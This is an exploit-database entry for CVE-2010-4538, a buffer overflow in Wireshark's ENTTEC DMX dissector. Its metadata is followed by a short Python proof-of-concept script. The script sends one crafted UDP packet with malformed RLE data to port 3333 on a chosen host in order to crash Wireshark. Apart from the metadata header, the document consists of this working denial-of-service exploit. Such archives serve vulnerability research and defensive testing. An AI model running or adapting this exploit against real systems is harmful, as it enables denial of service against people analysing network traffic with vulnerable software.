Wireshark - ENTTEC DMX Data RLE Buffer Overflow
Author: non-customers crew
type: dos
platform: multiple
port:
date_added: 2011-01-03
date_updated: 2016-11-12
verified: 1
codes: CVE-2010-4538;OSVDB-70244
tags:
aliases:
screenshot_url: http://www.exploit-db.com/screenshots/idlt16000/screen-shot-2011-01-04-at-120919-am.png
application_url: http://www.exploit-db.comwireshark-win32-1.4.2.exe
# source: https://www.securityfocus.com/bid/45634/info
#!/usr/bin/env python
# Wireshark ENTTEC DMX Data (UDP) Buffer Overflow PoC
# by non-customers crew in 2010
# http://rock-madrid.com/
import socket, sys
try:
host = sys.argv[1]
except:
print "usage: " + sys.argv[0] + " <host>"
sys.exit(2)
port = 3333
addr = (host, port)
data = "ESDD\x10\x20\x04"
data += "\x00\x0c"
data += "\xfe\xff\x41"
data += "\xfe\xff\x42"
data += "\xfe\xff\x43"
data += "\xfe\xff\x44"
udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
udps.sendto(data, addr)
except:
print "can't lookup host"
sys.exit(1)
udps.close()
sys.exit(0)